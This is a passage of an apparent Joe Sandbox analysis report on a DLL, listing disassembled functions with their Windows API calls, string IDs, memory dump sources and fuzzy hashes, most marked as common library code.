                  • FreeLibrary.KERNEL32(00000000,?,6CDFF8C4,6CDF5FC1,B583E81C,00000000,6CDFA99A,00000000,?,6CDFFA3D,00000022,FlsSetValue,6CE0D4F0,ccs,6CDFA99A), ref: 6CDFF876
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID: api-ms-$ext-ms-
                  • API String ID: 3664257935-537541572
                  • Opcode ID: ae8f04d9a92ccc47a107f3aaf904254b1b1d3bdd7bc796fb8cd79cc5e353af15
                  • Instruction ID: 405cddab5b2cc517201c4f2089265643c4184dac276e0659c5f811b74e5e073c
                  • Opcode Fuzzy Hash: ae8f04d9a92ccc47a107f3aaf904254b1b1d3bdd7bc796fb8cd79cc5e353af15
                  • Instruction Fuzzy Hash: CA210872F01119E7DB119B65CC80B4A77B8BB43378F260125E935A7790D730E912C6D0
                  Function 6CDFC20A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FAB51140,6CDFA99A,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC23F
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDFC251
                  • mydllmain.UIFTTNKL2R(B583E81C,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC262
                  • FreeLibrary.KERNEL32(00000000,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC273
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProcmydllmain
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 361333426-1276376045
                  • Opcode ID: 7590220388d4d6b3c9e613662b4e0c24b37da2d81281bf934a98d98083edd542
                  • Instruction ID: dc5e5c27f21268c63dcde9a36d8c752134f9fded225fe38b764fde346fa98487
                  • Opcode Fuzzy Hash: 7590220388d4d6b3c9e613662b4e0c24b37da2d81281bf934a98d98083edd542
                  • Instruction Fuzzy Hash: B5018F31B04619EBDB119B90CC09FAEBBB8FB45B15F104529E822A2690DB359910CAD0
                  Function 6CDFDBF7 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 47ec99b5c8bb707002f006cb681261f56ad97a74cb9623aa1d5cf861a412e95b
                  • Instruction ID: 2c63f7196531f16a3d049d74ace63d2bd4c2700609c8b44d10c9453455a02bd4
                  • Opcode Fuzzy Hash: 47ec99b5c8bb707002f006cb681261f56ad97a74cb9623aa1d5cf861a412e95b
                  • Instruction Fuzzy Hash: 47B10670A04289EFDB01CF99C840BEEBBB1BF5A318F164159E57497BA1C7709947CBA0
                  Function 6CDF1795 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: %sk$PCATaskServices$PT32S$pcalua.exe
                  • API String ID: 2638373210-541710397
                  • Opcode ID: 93ed09e847bc4bcd7e1a10286dd3b184cde09ab031ad6cf8d039585eae59893c
                  • Instruction ID: 33a573849c30ce536214a39ab89cc6ccbf498b23aaf1faddf216a5cb1ae97be1
                  • Opcode Fuzzy Hash: 93ed09e847bc4bcd7e1a10286dd3b184cde09ab031ad6cf8d039585eae59893c
                  • Instruction Fuzzy Hash: B5C19572900249ABDF15DFA4CC45BEE77B4FF08308F154119E915BB7A0EB749A0ACBA1
                  Function 6CDF444F Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00000001,?,6CDF43CD,6CDF33F7,6CDF2DC4,?,6CDF2FFC,?,00000001,?,?,00000001,?,6CE11F78,0000000C,6CDF30F5), ref: 6CDF445D
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDF446B
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDF4484
                  • SetLastError.KERNEL32(00000000,6CDF2FFC,?,00000001,?,?,00000001,?,6CE11F78,0000000C,6CDF30F5,?,00000001,?), ref: 6CDF44D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: 7c34103202058e9c109f043cd923a0c0f43cbf135862b2b6b901cdfdb1025db5
                  • Instruction ID: c5c4dc36d06cfabf014f882ef020fbe85c651f24d1d169326bb09731bceb14c5
                  • Opcode Fuzzy Hash: 7c34103202058e9c109f043cd923a0c0f43cbf135862b2b6b901cdfdb1025db5
                  • Instruction Fuzzy Hash: 2C01283230D611ADAA001B756E8565B37B4FB0237C722432EF57452DF0FF92482B4194
                  Function 6CE06DA4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                  Download Yara Rule
                  APIs
                  • __alloca_probe_16.LIBCMT ref: 6CE06E29
                  • __alloca_probe_16.LIBCMT ref: 6CE06EF2
                  • __freea.LIBCMT ref: 6CE06F59
                    • Part of subcall function 6CDFE25E: HeapAlloc.KERNEL32(00000000,6CE02423,?,?,6CE02423,00000220,?,?,?), ref: 6CDFE290
                  • __freea.LIBCMT ref: 6CE06F6C
                  • __freea.LIBCMT ref: 6CE06F79
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: __freea$__alloca_probe_16$AllocHeap
                  • String ID:
                  • API String ID: 1096550386-0
                  • Opcode ID: 53104b49fcb10f8949d789a013479e9623a108b507c3814dab78e362bf678a22
                  • Instruction ID: 2e7b02de5a7d3c899db5fc23a150b96ac2ec42c0c04379bb547c7650deaa65d5
                  • Opcode Fuzzy Hash: 53104b49fcb10f8949d789a013479e9623a108b507c3814dab78e362bf678a22
                  • Instruction Fuzzy Hash: 6651B072711606ABEB108F648C86FAB3BBDEF4565CB310129FD14DAA50E730CCA5C6E0
                  Function 6CDF452F Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(6CE12080,00000010,6CDF46A1,?,?,?,?,6CE120A0,00000008,6CDF4725,?,?,?,00000000), ref: 6CDF458E
                  • ___AdjustPointer.LIBCMT ref: 6CDF45F6
                  • ___AdjustPointer.LIBCMT ref: 6CDF4619
                  • ___AdjustPointer.LIBCMT ref: 6CDF46B5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: AdjustPointer$mydllmain
                  • String ID:
                  • API String ID: 3586548312-0
                  • Opcode ID: 7c5805ce92dfc8a1440261eb806d3e816d7bb23834e4b7da1578dcb81c377faf
                  • Instruction ID: dca39e9f974f2c2877948a5696615083e4b316848623e6c8a5cdd41c4b8ddfd0
                  • Opcode Fuzzy Hash: 7c5805ce92dfc8a1440261eb806d3e816d7bb23834e4b7da1578dcb81c377faf
                  • Instruction Fuzzy Hash: 8E51CF72606206DFEB158F10CA50BEA73B4BF44319F224529E8354BAB0E731E956CB50
                  Function 6CDF5562 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CDF5513,00000000,?,00000001,?,?,?,6CDF5602,00000001,FlsFree,6CE0BCD8,FlsFree), ref: 6CDF556F
                  • GetLastError.KERNEL32(?,6CDF5513,00000000,?,00000001,?,?,?,6CDF5602,00000001,FlsFree,6CE0BCD8,FlsFree,00000000,?,6CDF4524), ref: 6CDF5579
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CDF55A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID: api-ms-
                  • API String ID: 3177248105-2084034818
                  • Opcode ID: 26d0bcda0daf060657cf9922a09ee87ac861555935ead9fdc94cf7d382fb54f7
                  • Instruction ID: d68f2693b1a365badb6a4ae4511271442a115e96ca9cc4a1433ae5d21e571346
                  • Opcode Fuzzy Hash: 26d0bcda0daf060657cf9922a09ee87ac861555935ead9fdc94cf7d382fb54f7
                  • Instruction Fuzzy Hash: 19E04F30B4420CFBEF111FA1DC05B493B76BB02B58F258020F92CE89E1FB63952186C8
                  Function 6CE00698 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetConsoleOutputCP.KERNEL32(FAB51140,00000000,00000000,?), ref: 6CE006FB
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CE0094D
                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE00993
                  • GetLastError.KERNEL32 ref: 6CE00A36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                  • String ID:
                  • API String ID: 2112829910-0
                  • Opcode ID: bc68c3bd2bc26256e110de4a282d6b772efef14b899b45227811403e54d8451e
                  • Instruction ID: 2d6a87b8e55e569e0540d40fa4379cc16b0c1aa0be63e6f0242588881d453619
                  • Opcode Fuzzy Hash: bc68c3bd2bc26256e110de4a282d6b772efef14b899b45227811403e54d8451e
                  • Instruction Fuzzy Hash: ADD18D75E042889FDF01CFA8C8809EDBBB5FF49314F24416AE465EBB51E730A952CB90
                  Function 6CE08E93 Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6CE087FF), ref: 6CE08EAC
                  • mydllmain.UIFTTNKL2R(00000001,?,?), ref: 6CE09020
                  • mydllmain.UIFTTNKL2R(00000002,?,?), ref: 6CE09066
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: mydllmain$DecodePointer
                  • String ID:
                  • API String ID: 253863441-0
                  • Opcode ID: 64c69bc371721079bdc1bf258f2505dcba8f2cd72626474b2ed07cb28abb47f4
                  • Instruction ID: f36482295d6ae8d1249328a3bfa198cc7fe444f9f309419e268ec8cee64289aa
                  • Opcode Fuzzy Hash: 64c69bc371721079bdc1bf258f2505dcba8f2cd72626474b2ed07cb28abb47f4
                  • Instruction Fuzzy Hash: EA516E71B0450ECBCF108FA9D84A2AD7B75FF46318F310146E490AAF65CB758576CB94
                  Function 6CE01746 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • GetLastError.KERNEL32 ref: 6CE017AA
                  • __dosmaperr.LIBCMT ref: 6CE017B1
                  • GetLastError.KERNEL32(?,?,?,?), ref: 6CE017EB
                  • __dosmaperr.LIBCMT ref: 6CE017F2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                  • String ID:
                  • API String ID: 1913693674-0
                  • Opcode ID: 05327dd2c701c0f1a7c116ec7e5a8d3fefa493dd10110a8d0609399f618fc631
                  • Instruction ID: e4e178805b4d84699e39adf2c7582494381897765bbe1f4bcf2c3237eedc91e5
                  • Opcode Fuzzy Hash: 05327dd2c701c0f1a7c116ec7e5a8d3fefa493dd10110a8d0609399f618fc631
                  • Instruction Fuzzy Hash: 1921A131704709AF8B119FE6888099BB7B9FF0236D728461DE8249BF50E735ED6587E0
                  Function 6CE02A9A Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 6CE02AA2
                    • Part of subcall function 6CE029F7: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CE06F4F,?,00000000,-00000008), ref: 6CE02A58
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE02ADA
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE02AFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                  • String ID:
                  • API String ID: 158306478-0
                  • Opcode ID: 646016e230ab1faf1221836b8924076f2170056eae2348ccc58a57dc8f990b7d
                  • Instruction ID: bc299266615f033433fceab422444576d3a487d0c7add8bbb701df64d653b1af
                  • Opcode Fuzzy Hash: 646016e230ab1faf1221836b8924076f2170056eae2348ccc58a57dc8f990b7d
                  • Instruction Fuzzy Hash: F411C8B1B016167FAA211BB59C8CCAF79FCEF6A29C7250118F810D2600FF61DE2685F5
                  Function 6CE07FFD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WriteConsoleW.KERNEL32(00000000,00000000,6CDFB3AB,00000000,00000000,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000), ref: 6CE08014
                  • GetLastError.KERNEL32(?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?,?,?,6CE01064,00000000), ref: 6CE08020
                    • Part of subcall function 6CE07FE6: CloseHandle.KERNEL32(FFFFFFFE,6CE08030,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?,?), ref: 6CE07FF6
                  • ___initconout.LIBCMT ref: 6CE08030
                    • Part of subcall function 6CE07FA8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE07FD7,6CE0667E,?,?,6CE00A8A,?,00000000,00000000,?), ref: 6CE07FBB
                  • WriteConsoleW.KERNEL32(00000000,00000000,6CDFB3AB,00000000,?,6CE06691,00000000,00000001,?,?,?,6CE00A8A,?,00000000,00000000,?), ref: 6CE08045
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                  • String ID:
                  • API String ID: 2744216297-0
                  • Opcode ID: 37fe1c7d61852559f6f74be2488bb471c1462b4f644afdb947b44810a8cd1f59
                  • Instruction ID: ae0e8ae2bedb407b99114540c7c5e66b801302afc096c9d5f94265ab553b0e30
                  • Opcode Fuzzy Hash: 37fe1c7d61852559f6f74be2488bb471c1462b4f644afdb947b44810a8cd1f59
                  • Instruction Fuzzy Hash: 85F09236B45118BBCF221E96CC09A8A3F76FB0A3A5F145514FA2996660D7328930DBD4
                  Function 6CDF4B2B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • EncodePointer.KERNEL32(00000000,?), ref: 6CDF4B50
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID: MOC$RCC
                  • API String ID: 2118026453-2084237596
                  • Opcode ID: ce801cd692d3be67632b8fe6154fac62e3d0384acc0ec761ea2b0578f3760996
                  • Instruction ID: a584b4cf2513032bfd38ae0f042e7a4af276e18fcecbe1849f6c396b7004ec98
                  • Opcode Fuzzy Hash: ce801cd692d3be67632b8fe6154fac62e3d0384acc0ec761ea2b0578f3760996
                  • Instruction Fuzzy Hash: C1417C72900209EFDF06CF94CE90AEE7BB5FF48308F164159F9286B621D3359A52DB61
                  Function 6CDFFA63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(00000FA0,-00000020,6CE00071,6CE00071,-00000020,00000FA0,00000000,00000000,?,?), ref: 6CDFFA93
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6CE00071,-00000020,00000FA0,00000000,00000000,?,?), ref: 6CDFFAA3
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 6CDFFA73
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpinmydllmain
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 3077948437-3084827643
                  • Opcode ID: da1736f322bb6d95879742bd3d230748d53592139b0e112d7ba787c49aaf225f
                  • Instruction ID: e9e583202fbbc44453027d5fa05d0c3820dc0eea9fef5a97acb3218950ce6ff5
                  • Opcode Fuzzy Hash: da1736f322bb6d95879742bd3d230748d53592139b0e112d7ba787c49aaf225f
                  • Instruction Fuzzy Hash: 49E0653AA41118FBCF112FA4CC08D9E7F71FB04760B118820F92819A20C7328971EBE0
                  Function 6CDFFA21 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • mydllmain.UIFTTNKL2R(?,00000001,6CDF5FC1,00000001,?,6CDFBC5B,?,?,?,?,?,00000000,6CDFA99A,?,00000000,00000001), ref: 6CDFFA4E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: mydllmain
                  • String ID: FlsSetValue$ccs
                  • API String ID: 979097349-2990521015
                  • Opcode ID: 5aac5473019fc6fd40fc656be20b0dc786fb63fcddf97eb1e833f838aeeb006b
                  • Instruction ID: b1cd2b101636d16eb44f062e61b34da374df09e6815f4be88b3fe25491bfc26e
                  • Opcode Fuzzy Hash: 5aac5473019fc6fd40fc656be20b0dc786fb63fcddf97eb1e833f838aeeb006b
                  • Instruction Fuzzy Hash: 2BE0CD32F4102CB3C61027859C08ED7BF75F7407B2B118461FE2465721DA325931C7D0
                  Function 6CDFF964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1751675961.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000000.00000002.1751656860.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751699471.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751718593.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1751739620.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6cdf0000_loaddll32.jbxd
                  Similarity
                  • API ID: Allocmydllmain
                  • String ID: FlsAlloc
                  • API String ID: 2444374858-671089009
                  • Opcode ID: 48b098a2ba1b1b700a4fa5a18037902422f65498037332ec06771489e4415e0b
                  • Instruction ID: 67a4105f989c2954a36a5debe8df89624b72cb9b2c8e13de425874eee37125d0
